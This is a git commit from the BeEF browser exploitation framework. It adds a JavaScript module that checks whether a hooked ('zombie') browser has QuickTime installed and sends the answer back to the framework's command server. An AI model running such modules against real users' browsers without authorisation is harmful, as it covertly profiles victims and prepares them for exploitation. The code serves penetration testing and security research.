Add QuickTime to zombie balloon details

Add 'modules/browser/detect_quicktime'
This commit is contained in:
bcoles
2013-02-04 09:10:59 +10:30
parent 4003b69646
commit 79e8f34b06
5 changed files with 47 additions and 0 deletions

View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = (beef.browser.hasQuickTime())? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "quicktime="+result);
});